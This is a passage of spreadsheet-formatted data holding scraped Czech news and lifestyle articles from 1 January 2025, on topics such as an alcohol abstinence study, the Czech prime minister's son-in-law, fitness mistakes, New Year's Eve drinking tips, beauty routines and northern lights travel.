pro ženy a minimálně 5 drinků pro muže. Těžké pití je pak minimálně 8-15 nápojů týdně pro ženy a muže. Změny v organismu Uplyne měsíc. Ti, kteří s pitím přestali, hlásí široké spektrum zlepšeného zdraví. Abstinentův krevní tlak klesl o 6 %, zhubl asi o 1,5 kilogramu a riziko cukrovky kleslo o 25 %. „Ve zprávě jsme to neuváděli, ale všichni zmínili také mnohem lepší osobní pocit, celkovou koncentraci, a hlavně vydatnější spánek,“ uvedl Dr. Kevin Moore , autor experimentu a profesor hepatologie na University College London . Všiml si také, že v krvi abstinentů klesla hladina proteinů spojených s větším rizikem rakoviny, a to o 41 %. Tým viděl popsané i další změny po změnách v jídelníčku, cvičení a kouření, takže se dají slušně spojit právě s konzumací alkoholu . Nelze jasně stanovit delší trvání těchto změn, Moore je však optimista. „Je docela zřejmé, že alkohol má fyziologický dopad na naše tělo, takže by mě překvapilo, kdyby pozitiva najednou pominula.“ Nenechte si ujít: David Hasselhoff alias Mitch Buchannon z Pobřežní hlídky po 35 letech: Plastiky, mladá žena i vnouče Máme všichni přestat pít? „Jestli máte rakovinu a bojíte se o její rozvoj, pak byte měli,“ vysvětluje. Jde ostatně o obecnou radu pro všechny takto nemocné. Pro širokou populaci zdůrazňuje celkové benefity, hlavně lepší spánek a obecnou fyzickou kondici. Na druhé straně se lidé mohou cítit vyloučeni z kolektivu a osamělí. Je třeba zdůraznit, že se studie nezabývala lidmi s historií alkoholové závislosti. Jiné výzkumy ale ukazují, že oblasti mozku poničené právě dlouhodobým výrazným pitím se po vysazení alkoholu začnou samy opravovat. Nenechte si ujít: Autor: Jonáš Jenšovský Autor person Jonáš Jenšovský Rubrika transition_slide Člověk</t>
  </si>
  <si>
    <t>143400</t>
  </si>
  <si>
    <t>148440</t>
  </si>
  <si>
    <t>20250101_16_3698133586_fc3ef6fa3de640dd9ae8.html</t>
  </si>
  <si>
    <t>fc3ef6fa3de640dd9ae8</t>
  </si>
  <si>
    <t>Manžel Fialovy dcery: „Nejnáročnější, ale nejlepší rok v životě.“ Přidal i přání do roku 2025</t>
  </si>
  <si>
    <t>Manžel Fialovy dcery: „Nejnáročnější, ale nejlepší rok v životě.“ Přidal i přání do roku 2025 Přelom roku bývá pro mnohé politiky časem k bilancování. Pustila se do něj i vycházející hvězdička ODS Michal Chládek, šéf Mladé ODS a zároveň od loňského roku nově i zeť premiéra Petra Fialy ( ODS ). Chládek si totiž vzal za manželku Fialovu dceru Kláru , dnes již paní Chládkovou. A ze společného soužití čas od času přinese i nějaké foto na svém instagramu. Chládek se ohlédl krátce za rokem 2024 také. Jako za nejnáročnějším, ale nejlepším v životě. „Nejnáročnější, ale nejlepší rok v životě. Jsem vděčný!“ Těmito slovy se za rokem 2024 ohlédl šéf Mladé ODS a zeť premiéra Petra Fialy Michal Chládek. Přidal i sérii fotek, kterým jasně vévodí jedna svatební... Fialovu dceru Kláru si vzal po čtyřech letech společného chození v červenci 2024. Právě s manželkou Klárou Chládkovou, dříve Fialovou , přidali po půl roce manželství po Vánocích i společný příspěvek od vánočního stromu a sklízeli pochvalné komentáře, jak že jim to spolu sluší. „Doufáme, že jste svátky prožili v klidu a pohodě. A do nového roku přejeme hlavně, aby se vám dařilo přesně podle vašich představ!“ vzkázali novomanželé Chládkovi. Chládek: Šli jsme do toho po hlavě „Jsem předseda Mladé ODS . Je mi 28 a díky politice jsem poznal skvělý přátele a teď už i kolegy. Jsem zastupitel a advokátní koncipient. Myslím, že Mladá ODS je skvělá příležitost pro každýho,“ popisuje přitom na instagramu sám sebe Chládek. V dubnu 2024 se přitom o své lásce Kláře rozsáhle rozepsal právě tam. „Čtyři nejlepší roky života. A to jen díky tomu, že mi první karanténový den napsala Klárka. Je to paradoxní, ale nejhezčí období života mi začalo právě v době, kdy to pro spoustu lidí nebylo jednoduchý. Na začátku covidu. Z ničeho nic vidím na obrazovce zprávu od Klárky. Myslel jsem si, že je to fejkový profil. Nebyl a odepsal jsem. A jsem zato fakt rád,“ napsal Chládek v dlouhém příspěvku 16. dubna. „Na prvním rande jsme měli roušky a ani jsme si nemohli dát pusu. Po měsíci jsme jeli poprvé společně na víkend a po dvou měsících jsme spolu začali bydlet. Šli jsme do toho po hlavě, protože jsme cítili, že je to něco výjimečného. A taky, že bylo. Společně jsme zvládli už skoro celou medicínu Klárky, která se celou dobu jen zlepšuje. Moje státnice a vstup do právní i politické kariéry. Třikrát jsme se stěhovali a našli si společné přátele. Před rokem jsem Klárku požádal o ruku a ona řekla ano. Nechal jsem se pokřtít, ne kvůli svatbě, ale protože věřím - hlavně v hodnoty, které křesťanství reprezentuje. No a už za pár měsíců se vezmeme a já se nemůžu dočkat na společný život. Miluji tě,“ dodal. Fialova dcera v kampani: Je mi vždycky oporou Aktuálně je Chládek zastupitelem Jihomoravského kraje , uspěl totiž v krajských volbách 2024. „Protože je mi vždycky oporou a dá se na něj spolehnout,“ říkala před krajskými volbami již coby manželka Klára Chládková v klipu, kde vystupovali i tatínek s maminkou Chládka. S vínem v ruce a špagetami před sebou pak burcovali společně s Klárou voliče, aby vyrazili volit koalici Spolu. „ Víno , špagety a chvilka klidu. My už pro to víc neuděláme. Vy ještě můžete. Pokud jste nebyli volit, běžte prosím zítra. A volte SPOLU,“ psal v září 2024 Chládek. Po svatbě Itálie i Chorvatsko Michal Chládek přitom dál čas od času přinese na sociální síti nějaký střípek ze společného soužití s dcerou premiéra. V létě 2024 stihli po červencové svatbě např. objet Itálii . „ Terst , Padova , Bologna , La spezia , Pisa , San Daniels a Janov ,“ vypočítával Chládek navštívená města. V srpnu se stihli ještě vydat do Chorvatska a navštívili Záhřeb . Svatbu loni nezažili „jen“ tu svojí, ale svateb navštívili společně více. „Včera jsme i přes všechen déšť a nepřízeň počasí byli na svatbě našich blízkých kamarádů. Bylo to skvělé,“ psal Chládek v září. Fiala: Dcera si vybrala dobře Ke své vlastní svatbě pak Chládek rovněž na instagramu podotkl: „Vždycky jsem si myslel, že věta: „Na svatební den nikdy nezapomeneš,” je klišé. Není.“ A nezapomenutelný zážitek to byl i pro premiéra Fialu . O svatbě své dcery totiž mluvil v pořadu Ptám se, pane premiére i sám pyšný otec a Chládkův tchán - předseda vlády Petr Fiala . „Když jsem svou dceru vedl k oltáři, tak jsem samozřejmě tu radost prožíval a myslím, že i manžel, její partner, kterého si vybrala, že si vybrala dobře,“ pochvaloval si zetě šéf ODS . „Byla to hezká svatba, normální, řekl bych střídmá, ale důstojná, v příjemném prostředí,“ přiblížil chvíle, kdy si Michal a Klára Chládkovi řekli svá ano. Blesk TV Daniel Kraus, Lukáš Červený Petr Fiala o oslavě narozenin a svatbě dcery Michal Chládek Instagram - M. Chládek Instagram Michala Chládka Blesk:FOTO:CNC/ KAREL KOPAC Instagram M. Chládka Instagram Richarda Berana Michal Chládek ( ODS ) si vzal Kláru Fialovou , dnes již Chládkovou. Klára Chládková, dcera Petra Fialy , v klipu na podporu svého manžela před krajskými volbami 2024 Klára a Michal Chládkovi v Itálii Předseda Mladé ODS Michal Chládek při rozhovoru pro Blesk Klára Fialová a Michal Chládek Premiérova dcera Klára a Michal Chládek Dcera premiéra Petra Fialy Klára se vdala za předsedu Mladé ODS Michala Chládka. Svatba premiérovy dcery Kláry a Michala Chládka Autor: simao Autor person simao Rubrika transition_slide Politika</t>
  </si>
  <si>
    <t>895180</t>
  </si>
  <si>
    <t>20250101_160_3695937270_cae1448993c52da78b65.html</t>
  </si>
  <si>
    <t>cae1448993c52da78b65</t>
  </si>
  <si>
    <t>Chystáte se začátkem nového roku opřít do fitness? Pozor za na časté chyby začátečníků</t>
  </si>
  <si>
    <t>Chystáte se začátkem nového roku opřít do fitness? Pozor za na časté chyby začátečníků 01.01.2025 Leden je plný novoročních předsevzetí. Přestat kouřit, omezit alkohol , méně se stresovat, zdravě jíst, začít sportovat nebo zhubnout. Pokud v posilovně nebo s cvičením obecně začínáte, dejte si pozor na nejčastější chyby, kterých byste se mohli dopouštět. Špatná technika a intenzita Častou chybou začátečníků ve fitness je, že nedodržují správnou techniku. Mnoho cviků pak provádějí chybně, což jim brání v dosažení progresu a co také může ohrozit jejich zdraví. Je důležité dodržovat správnou techniku a zapojovat správné svalové partie. Další chybou je nedostatek intenzity. Jedná se cvičení příliš lehce nebo příliš těžce, což neumožňuje spalovat tuky, budovat svaly nebo zlepšovat kondici. Je důležité cvičit v optimální tréninkové zóně, která závisí na vaší maximální tepové frekvenci. Nedostatečná variabilita cviků Začátečníci často zatěžují omezený počet partií, a tedy celé tělo posilují nerovnoměrně. Výsledek cvičení pak je jen částečný. Pokud budete dělat stejnou rutinu zase a znovu, vaše tělo si navíc zvykne. A zatímco v začátcích jste zažili pokrok, časem ustrnete. Proto je vhodné každých pár týdnů změnit rutinu cvičení, abyste tělo překvapili něčím novým. Nejen, že tak budete své tělo motivovat k novým cílům, ale zabráníte také tomu, abyste se začali nudit. Chybějící plán Jednou z největších fitness chyb, kterou začátečníci dělají, je absence plánu. Většinou se ztraceně toulají po tělocvičně a přemýšlejí, na co se který stroj používá. Pak k některému sednou a provedou několik opakování s nepromyšleně zvolenou zátěží. Bez precizního plánu nikdy nedosáhnete svého cíle. Bez systému a řádu, který byste měli dodržovat, se k ničemu nedopracujete, jen plýtváte časem a energií. Moc vysoké cíle Stanovování vysokých cílů vás může výrazně brzdit. Ve fitku platí pravidlo - krůček po krůčku. Měli byste si proto stanovit cíle, kterých můžete reálně dosáhnout na základě své aktuální kondice. Bez ohledu na to, zda chcete zhubnout 20 kilo nebo přeměnit tuk na svaly. K těmto cílům se budete muset propracovat postupně. Proto je důležité si vše rozdělit do menších kroků, ale o to lépe dosažitelných cílů. Podcenění oblečení a vybavení Pokud to s fitness myslíte vážně, vyplatí se dbát na oblečení i obuv a investovat do kvalitního sportovního vybavení. „Funkční tričko, vhodné sportovní spodní prádlo a ponožky jsou ideální pro odvádění potu a zároveň zachování teplotního komfortu. Spodní prádlo ze syntetických materiálů je ideální v případě intenzivního zátěžovému cvičení jako jsou kruhové či silové tréninky, fitness obecně či běhání nebo cyklistika. Funkční syntetické materiály totiž odvádějí vlhkost a udržují pokožku v suchu,“ říká Ruslan Skopal ze specializovaného e-shopu Trenýrkárna.cz a dodává: „Co se týče střihu, záleží na každém, pro jaký se rozhodne. Pro ženy, kterým nejsou ani v běžném životě pohodlná tanga, nejsou vhodná ani při sportu. Spodní prádlo by vás nemělo stahovat, ale ani by nemělo být příliš volné.„ Nezapomínejte ani na vhodnou obuv. Správné boty vám totiž pomohou s koordinací, ale také zlepší tréninkové výsledky, usnadní provádění mnohých cviků či zdokonalí jejich technické provedení nebo i zvýší výkon. Podcenění křečí Křeče spojené s pohybovou aktivitou (tzv. EAMC – Exercise-Associated Muscle Cramps) jsou lokální svalové kontrakce kosterního svalu či celé svalové skupiny. Přicházejí v průběhu či těsně po sportovním výkonu. Postihují nejčastěji svaly na stehnech a lýtkový sval. Nepříjemné jsou zejména, protože způsobují nejen chvilkovou, ale i několikadenní bolestivost. Nejčastěji jsou křeče způsobeny nedostatečným protažením a zahřátím svalů před sportovním výkonem. Právě nedostatečná příprava a podcenění zahřátí svalů může způsobit jejich přetížení a křeče. Mezi další příčiny pak patří nadměrné namáhání svalů, příliš intenzivní trénink, přetížení a často opakované pohyby. „Další příčinou je dehydratace, nedostatečný příjem tekutin během sportovního výkonu, který může vést k nerovnováze elektrolytů a způsobit svalové křeče. V neposlední řadě je to také nedostatek minerálů. Nízká hladina draslíku, vápníku nebo hořčíku v těle je také často další příčinou. Ideální je do těla hořčík dostávat v nápojích, vhodným řešením je obohatit vodu, kterou pijeme každý den. Řešením jsou moderní filtry kohoutkové vody, které lze jednoduše pořídit domů, a které kromě eliminace nečistot či bakterií přidají do vody právě hořčík a další minerály,“ říká Jaroslav Žák z BWT. Špatný jídelníček Velmi častým opomenutím fitness začátečníků je podcenění důležitosti změny stravovacích návyků a úpravy jídelníčku. Ale bez toho to nepůjde. I to, co se totiž zdá být relativně zdravé, nemusí být výživově v pořádku. Proteiny mohou pomoci budovat svalovou hmotu a při úsilí zhubnout, ale většinou jich sníte příliš mnoho a ignorujete další klíčové živiny, jako jsou celozrnné výrobky a tuky. Důležité je se kromě sacharidů, bílkovin a tuku soustředit také na konzumaci vitamínů a minerálů, které jsou nezbytné. Jednoduše, pokud chcete dosáhnout maximálních výsledků, obraťte se na trenéra nebo výživového experta, který vám nastaví jídelníček vhodný vašemu tréninkovému plánu. Šebík Zdroj, foto: BWT, ASPEN PR.</t>
  </si>
  <si>
    <t>20250101_161_3696028823_2aa450ef1e09c395b2a4.html</t>
  </si>
  <si>
    <t>2aa450ef1e09c395b2a4</t>
  </si>
  <si>
    <t>Novoroční masakr v New Orleans: 10 mrtvých! Auto vjelo do davu slavících lidí</t>
  </si>
  <si>
    <t>447590</t>
  </si>
  <si>
    <t>20250101_162_3695940953_38fc334d2c4c8f808c58.html</t>
  </si>
  <si>
    <t>38fc334d2c4c8f808c58</t>
  </si>
  <si>
    <t>Desítky výjezdů kvůli silvestrovským oslavám evidují hasiči a taky záchranáři</t>
  </si>
  <si>
    <t>Desítky výjezdů kvůli silvestrovským oslavám evidují hasiči a taky záchranáři. Jen v Praze zasahovali u stovky událostí, v devíti případech šlo o zranění způsobená zábavní pyrotechnikou. Záchranáři po celé republice řešili taky otravy alkoholem nebo napadení. Hasiči vyjížděli i k požárům keřů či odpadkových košů. 🔗 Více v článku: https://czch.tv/oJqEJB</t>
  </si>
  <si>
    <t>20250101_163_3695927317_12c3b6e9fa833a26d42f.html</t>
  </si>
  <si>
    <t>12c3b6e9fa833a26d42f</t>
  </si>
  <si>
    <t>Je tu Silvestr. Jak to udělat, abyste neskončili pod stolem?</t>
  </si>
  <si>
    <t>Je tu Silvestr. Jak to udělat, abyste neskončili pod stolem? WhatsApp ILUSTRAČNÍ FOTO - pixabay Poslední den v roce nastal. A se silvestrovskou oslavou se pojí nejen dobroty, které každý s oblibou zobe, ale samozřejmě i alkohol . Kdo by si rád neužil lahodného moku, zvláště při takové příležitosti? Jenže ono je všechno, jak se říkává, »odsaď pocaď«. Člověk si to sice užije, ale jakmile přijde druhý den, kolikrát zjišťuje s hrůzou, co prováděl. Co tedy udělat, abychom se vyhnuli celospolečenské ostudě a neskončili mimoplánově pod stolem? A abychom se vyhnuli následné kocovině? Tady je sedmero základních rad! Speciálně pro dnešní den… 1.) Najezte se předem Že bude v rámci silvestrovského večírku i chutný raut? Nebo snad grilování? Chlebíčky? Budiž, ale přesto pro vás máme jednu dobrou radu. Nezůstávejte předem o hladu jen z toho důvodu, aby se vám vešlo do žaludku co nejvíce toho, co se bude podávat na párty a za co většinou mnoho neplatíte. Většinou se dobroty servírují až po několikátém přípitku, a to už by mohlo s vaší »společenskou kondicí« náležitě zamávat. Ideální je, dát si před silvestrovským večírkem nějaké pečivo, ať už jakékoli. Zasytí nadlouho, navíc vás z něj nebude, v kombinaci s alkoholem , pálit žáha, ani se vám nebude, takříkajíc, »vracet«. Důležité je mít tzv. základ, čili něco málo snědeno, a pak si klidně dejte na přivítanou, co hrdlo ráčí. I v poslední den v roce… 2.) Nemíchejte Že si užijete na úvod lahodný šampus? Pak pivečko? To by ještě šlo. Ale v ten moment už brzdit. Ne v množství, je nám jasné, že ve společnosti se výzvám »dej si ještě jedno« neubráníte, ovšem brzděte v druzích alkoholu . Jakmile smícháte pivo s vínem , do toho přijde nějaký ten panák, nadto více druhů kořalek , zaděláváte si na pořádnou »vopici«, a ti, kdo nejsou na podobné »pijatiky« zvyklí, i na možnou ostudu. Ideální je pít celý večer jen jeden typ lahodného moku. Například jen pivo . Nebo jen víno . A když už si musíte přiťuknout i něčím tvrdším z prostého důvodu, aby byl příští rok lepší, pak to řeďte zásadně nealkem. Ideální je cola. 3.) Hýbejte se Při oslavě v restauraci nebo u někoho v domácnosti je nemožné dělat kliky nebo dřepy, to je nám jasné. Ani patnáctistovku s třemi dvanáctkami v krvi asi nezaběhnete. Ale ideální pro lepší vstřebávání alkoholu je nesedět jen na zadku a zpestřit si večer něčím, co se nazývá lidově, a tak trochu pejorativně, hospodskou zábavou. Dejte si šipky, kulečník nebo stolní fotbálek. Nebo si zatancujte. Tím, že se mysl začne soustředit na jinou činnost, a navíc i vaše tělo nebude bez pohybu, usnadníte mu vstřebání alkoholu . Ne stoprocentně, ale aspoň částečně… 4.) Naučte se říkat NE Jeden dobrý fór tvrdí, že ideální recept v boji s alkoholismem je naučit se říkat NE. Co třeba víno ? Proč NE…? Ano, takhle je to vtipné, ovšem ve skutečnosti si zaděláváte na problém v jeden den, a bolehlav v den druhý. Jakmile budete cítit, že se s vámi začíná točit svět, zbrzděte. Řekněte: NE, dám si chvíli pauzu. Vyrazte na vzduch, nebo si zahrajte některou z výše uvedených her, pokud tedy trávíte silvestra v některé z restauracích. Hlavně ale nesoutěžte první ligu s borci, kteří by mohli v pití hrát extraligu. Záhy byste toho litovali… 5.) Zobejte Základ naplněného žaludku jídlem jste si přinesli z domova, pokud jste tedy dali na naši radu číslo 1, ovšem chce to neustále doplňovat zásoby. Jakmile cítíte, že se vaše hlava motá více, než je zdrávo, zajezte to. Dejte si něco z připraveného občerstvení. Nebo si objednejte, pokud slavíte v restauraci, nějakou dobrou večeři. A neustále zobejte oříšky, brambůrky a tyčinky. Což o to, zdravá ani dietní výživa to není ani náhodou, ale zato vám pomůže naředit škodlivé látky, které začínají působit na vaši motoriku i rétorické schopnosti. 6.) Pozor na léky Je to nevyzpytatelná kombinace. Pokud berete nějaké léky a pak je »zapijete« alkoholem , zaděláváte si na problém. Minimálně na riziko problému. Raději se vyhněte pozření jakékoli medikamentu před oslavou nebo v jejím průběhu – pokud to zrovna není prostředek proti pálení žáhy nebo něco na ten způsob. Že už jste na prášky v minulosti pili – a nic se nestalo? Tak to jste měli štěstí. Ne vždy si s tím tělo dokáže poradit. Spíše by se chtělo říci – poradit si umí jen výjimečně… 7.) Kvalita alkoholu Po kvalitním alkoholu se zaprvé tolik neopijete a zadruhé vás druhý den bude bolet hlava jen minimálně nebo vůbec. Jak ale poznat takový kvalitní alkohol ? Rozhodně nepijte levnou kořalku od sijských obchodníků. Raději si za láhev připlaťte. A pokud jste v restauraci, zkoumejte její kvalitu. Ve vícehvězdičkových podnicích si sice připlatíte, ale zato máte větší pravděpodobnost, že vám tam nenalejí »splašky«. Nu a pokud jste na silvestrovském rautu nějaké velké společnosti, starejte se o to, kdo připravoval catering. O každé z těchto firem se dá nalézt na internetu řada podstatných informací, které vám mohou posloužit k rozhodnutí, jak moc budu za večer týrat svá játra. Když už člověk musí slavit a nejde to úplně »s mírou«, pak ať alespoň ničí svůj organismus co nejméně. O vyhnutí se společenské ostudě ani nemluvě… Marcela Špičková Autor: iportaL24.cz || | || | | iportaL24.cz</t>
  </si>
  <si>
    <t>949</t>
  </si>
  <si>
    <t>20250101_164_3695924713_d0e58225fa2676f3a896.html</t>
  </si>
  <si>
    <t>d0e58225fa2676f3a896</t>
  </si>
  <si>
    <t>7 beauty návyků, které by sis měl*a vzít do nového roku</t>
  </si>
  <si>
    <t>7 beauty návyků, které by sis měl*a vzít do nového roku Chystáš novoroční glow-up? Tak to rozhodně nepůjde bez těhle beauty návyků. Máš pocit, že tvoje beauty rutina teď prostě nehituje? Pleť nepleťuje, make-up nemake-upuje? Tak tenhle článek je přesně pro tebe, protože kdy jindy vyzkoušet nové tipy než na nový rok. A ne nadarmo se říká - jak na nový rok, tak po celý rok. Představ si, jak dobře se budeš cítit se svojí novou rutinou. Nevím, jestli jsem jediná, ale každý rok si říkám, jak budu poctivě např. používat gua shu, zakomponuju do rutiny retinol nebo budu každý den dělat dvojité odličování. Okamžitě si pořídím všemožné produkty, ale hned jak přijde náročnější období, jsem ráda, že se namažu krémem. Proč to říkám? Přemýšlej nad svojí beauty rutinou udržitelně a zahrnuj jednotlivé kroky postupně. Tvoje zdraví by měla být tvoje priorita a čím starší jsem, tím víc si uvědomuji, jak vnitřek ovlivňuje můj zevnějšek. Pokud nebudeš pít dostatek vody, tak ti žádná kyselina hyaluronová nevykouzlí hydratovanou pokožku. Pokud budeš mít rozházené hormony, bude se to projevovat na tvé pleti a ani to nejdražší sérum ti nepomůže. Já mám geneticky dobrou pleť, nemám sklony k akné, spíše bojuji se suchou pletí. Pár let zpátky se mi ale objevilo (na moje poměry) silné akné. Začala jsem teda sahat po různých kyselinách, sérech, čističích a nic nezabíralo. Ale ve chvíli, kdy jsem si srovnala menstruaci a hormony štítné žlázy, moje pleť byla opět jako předtím. Pokud s něčím podobným právě bojujete, zamyslete se nad svým lifestylem, nad tím, co jíte, jakou práci děláte... Možná tam najdete ten pravý spouštěč. Takže this is your sign, aby si nezapomínal*a na tvoje yearly check-ups u doktorů! Tiktok influenced me! Dry brushing, neboli kartáčování na sucho, zkouším zahrnout do své rutiny už pár týdnů. A jaké jsou jeho výhody? Asi nejvíc viditelná je exfoliace pokožky, ale dokáže i rozproudit krev a lymfu. A teda IMO je to i skvělá masáž. Na tiktoku je mnoho tutoriálů, jak otevřít lymfatické uzliny a jak postupovat při kartáčování. Stačí ti k tomu jen kartáč (já mám obyč z DMka) a tak 5-10 minut tvého času před večerní sprchou . Po sprše se nezapomeň namazat a jen si užívej krásně napapkanou vypnutou pokožku. FYI, dry brushing nemusí vyhovovat citlivé pokožce, pokožce s akné, nebo ekzému. Takže buď opatrný! Jestli si beauty freak, tak gua shu ti opravdu představovat nemusím. Na trhu teď najdeš spoustu masážítek a různých vychytávek, ale stará dobrá gua sha je prostě nejlepší. Stejně jako u dry brushingu v pleti rozproudíš lymfu, a tím ji zpevňuješ a zároveň jemně definuješ kontury obličeje. O tomhle všichni víme, ale všichni to šidíme...Takže pokud stále na odlíčení používáš vlhčené ubrousky, tak je prosím zase schovej do šuplíku, protože ty ti nic neodlíčí a spíš to tak šmrdláš. Správné odlíčení je ale základ všeho. Čistá pleť lépe vsákne produkt a lépe se vrství, zároveň tvoří ideální clean canvas na líčení. Co si osobně nemůžu vynachválit je double cleansing. Dvoufázové odličování vždy začínám olejovým čističem na suché pleti, po 5 minutách přidám vodu a nechám zpěnit. Smyju a pokračuju jemnějším odličovacím gelem. Přiznám se, že ale tohle nedělám každý den. Ve dnech, kdy to prostě nefeeluju, tak odličuju olejovou micelárkou a pak dočistím ve sprše čistícím gelem. Jednorázově to funguje skvěle, ale vím, že po pár dnech potřebuju klasický double cleansing. Přiznej se, kdy sis naposled myl*a štětce? Jop... Štětce jsou oblíbeným domovem pro bakterie a další neplechy, co můžou následně na pleti vést k zarudnutí, zánětům a pupínkům. Ideální by bylo štětce čistit po každém použití, ale pojďme si nalít čistého vína , kdo z nás má tak moc put together life? Doporučuji si teda koupit čistič na štětce ve spreji (já miluju ten z DMka) a aspoň je jednou za 5-7 dní vyčisti . Hloubkové čištění pak záleží na tom, jak často se líčíš, ale třeba 1x za měsíc je to fajn. Já si vždycky vytvořím takový čistící mix (jar, šampón, kondicionér) a s pomocí čistící podložky jedu štětec po štětci. Druhá varianta je vzít si po ruce tuhé mýdlo a čistit štětce přímo na mýdle. V obou případech si ale dávej pozor, abys nenechal*a štětce moc dlouho ponořené ve vodě, aby se ti nerozpustilo lepidlo. Jestli chodíš spát s mokrou hlavou, tak pls přestaň. Nejen, že mokré vlasy jsou mnohem více náchylné k lámání, ale zároveň je vlhké prostředí na pokožce hlavy ideální místečko pro bakterie a infekce . And you don't want that! Proto by sis měl*a vlasy po každém mytí vyfoukat do sucha a hlavně dávat pozor na to, aby suchá byla tvoje pokožka hlavy. Jestli ale z nějakého důvodu nemůžeš jít spát se suchými vlasy, tak se snaž vysušit aspoň pokožku hlavy , zamezíš pak třeba svědění. Pokud si nechceš foukat vlasy, protože máš pocit, že ti to vysušuje vlasy, na trhu je plno produktů, které proti tomu bojují, ochrany před teplem, oleje, séra apod. Máš dlouhé vlasy a máš pocit, že vysušit vlasy trvá věčnost? Zkus sáhnout po ručníku z mikrovlákna. Lépe saje vodu a pokud ho máš rychle promočený, pořiď si dva a vystřídej je, ať ti z vlasů vytáhne co nejvíce vody. Možná se tu budu opakovat a už ti tahle rada přijde trapná, ale věř mi, že tohle je opravdu důležitý krok v tvé rutině. Naprosto chápu, že teď možná máš pocit, že to přece nic extra nedělá, ale in the long run za to budeš vděčný*á. UV paprsky umí s naší kůží udělat opravdu paseku - vrásky, pigmentace a i rakovina kůže. To snad chceš? Dneska najdeš SPF na každém rohu, jsou často už zahrnuté v obyčejných produktech a tím usnadňují každodenní užívání. Pokud se ale vyhýbáš SPF, protože máš pocit, že tak divně sedí na pleti, tak věř mi, že si ještě nenašla ten správný. Doporučuji ti sáhnout po nějakých fluid krémech (které jsou často lehčí) nebo kouknout po korejských značkách (Korejci ty SPF prostě umí nejlíp). Největší problém, který já mám s SPF, je reaplikace během dne. SPF 50 ti totiž chrání pleť jen pár hodin a měl*a bys jej během dne minimálně 1-2x reaplikovat. Jak ale na to, když nosíš během dne make-up, nebo nemáš možnost pleť řádně vyčistit a nanést novou vrstvu. Toto téma jsem jednou řešila s kosmetičkou v obchodě Kiehl's, kde mi řekla, že pokud většinu dne sedíte uvnitř, stačí SPF aplikovat ráno, protože to způsobí méně damage, než kdybyste reaplikovali na špinavý obličej špinavýma rukama. Pokud ale víte, že budete venku, tak zkuste sáhnout po SPF ve sticku nebo ve spreji. Tvoje fyzické a mentální zdraví by mělo být vždycky tvojí prioritou! Dělej pouze to, co ti dělá dobře, co tě baví a všeho s mírou. Je naprosto v pořádku, když sem tam půjdeš spát s mokrou hlavou nebo si zapomeneš dát SPF...svět se nezboří. Pokud začneš upřednostňovat sám*sama sebe, uvidíš ty největší rozdíly! Autor: Nhu Quynh Le Autor person Nhu Quynh Le</t>
  </si>
  <si>
    <t>1820</t>
  </si>
  <si>
    <t>1990</t>
  </si>
  <si>
    <t>20250101_165_3695923735_5dd5aeee5f5df88fed74.html</t>
  </si>
  <si>
    <t>5dd5aeee5f5df88fed74</t>
  </si>
  <si>
    <t>Bude rok polárních září, vidět bude i v Česku. Zjistěte, kde a jak ji pozorovat</t>
  </si>
  <si>
    <t>Bude rok polárních září, vidět bude i v Česku. Zjistěte, kde a jak ji pozorovat Temné období roku, v němž se právě nacházíme, v sobě skrývá špetku magie. „Za jasných mrazivých nocí maluje příroda na nebe jedinečný obraz, který zanechává všechny přihlížející v němém úžasu. V těchto měsících přichází solární maximum, tak si nenechte polární záři utéct,“ doporučuje Petra Kejklíčková. Polární záře je projev vesmírného počasí, který fascinuje lidstvo odpradávna. Zobrazenou ji najdete například na francouzských jeskynních malbách starých více než třicet tisíc let. Propletla se také do legend nejrůznějších národů po celém světě. Vikingové věřili, že polární záře je odraz světla od štítů a brnění válečnic valkýr, které odvádějí padlé bojovníky k Ódinovi. Severoameričtí indiáni viděli v polární záři pochodně, kterými tajemné bytosti svítí na cestu do země hojnosti nedávno zemřelým duším. Také Sámové se polární záře báli, protože ji považovali za putující duše, a proto o ní měli zakázáno mluvit. Skotové viděli v mihotavém světle odrazy ohromné bitvy nebeských bojovníků. Podle finské pověsti vznikla polární záře tak, že po obloze běhaly velmi rychle polární lišky a při tom otíraly své chundelaté ocasy o hory. Dotek vytvořil jiskry a rozzářil oblohu. Mnoho z operátorů také nabízí možnost vyrazit podruhé zdarma, pokud se napoprvé lov nezdaří. Věda prokázala, že za vznikem polární záře se neskrývají běhající lišky, ale vytváří ji Slunce a kontakt jeho částic s magnetickým polem a atmosférou Země. Nejčastěji se objevuje v polárních oblastech, ale občas rozzáří oblohu i v jižnějších zeměpisných šířkách. Vyniká za jasných podzimních a zimních nocí. Kdy přesně se polární záře na obloze objeví, závisí na nevyzpytatelných slunečních erupcích. V tomto roce budeme mít větší pravděpodobnost spatřit tento jev než v předchozích letech. Přichází totiž solární maximum. Jde o vyvrcholení zhruba jedenáctiletého slunečního cyklu hodnoceného podle intenzity a četnosti skvrn viditelných na povrchu Slunce. NASA a další organizace zabývající se kosmickým počasím letos v říjnu oznámily, že jsme vstoupili do fáze nejvyšší sluneční aktivity, která se může protáhnout o celý další rok. Je tedy vhodná chvíle vydat se za polární září. 23 fotografií Přestože fotky nebo videa pořízené z míst, kde se aurora borealis vyskytla, vypadají úchvatně, není nad její živé pozorování. Tiše klouže po nebi jako návštěvník z jiných světů. Na svých cestách jsem ji několikrát spatřila. Většinou šlo o nečekané překvapení, které mi zlepšilo celý výlet. Kam se tedy za aurorou vydat? Evropa nabízí hned několik oblíbených destinací, kam lovci polární záře míří. Vyberte si místo a vypravte se na nezapomenutelnou zimní dovolenou Skandinávie a Finsko za polárním kruhem Pevninské oblasti Norska , Švédska a Finska ležící za polárním kruhem patří k nejlepším oblastem, kde můžete auroru borealis sledovat. Leží totiž v aurorálním oválu. Jde o prstencovitou oblast obtékající severní pól, v níž vznikají nejpůsobivější záře. Polární záře nad Tromsø Centrem lovení polární záře je norské město Tromsø. Od podzimu do jara se sem vydávají lidé, kteří chtějí zahlédnout tento přírodní úkaz. Je tu totiž malé světelné znečištění a dobré zázemí pro turisty. A když nevyjde lov na polární záři, můžete se vydat na moře na plavbu za velrybami. Další oblíbenou destinací je finské Rovaniemi, které proslulo jako Santovo městečko. Návštěva kolem Vánoc je tu obzvlášť kouzelná. Jinak však Rovaniemi nabízí kolem sto padesáti dní v roce, v nichž můžete sledovat polární záři. Já jsem si pro návštěvu Laponska a výpravu za polární září vybrala ještě severnější město Kaamanen, ležící nedaleko letiště v Inari . Oblastí, kterou obývají Sámové, se prohánějí stáda sobů a nezřídka tu narazíte na psí spřežení. Vyzkoušela jsem si tu jeho řízení během pár světlých hodin polární noci. Tundra se nám odměnila namodralými výhledy na zasněženou krajinu. Po návratu od našich psích průvodců jsem se ohřála v sauně a pak vyrazila za aurorou. 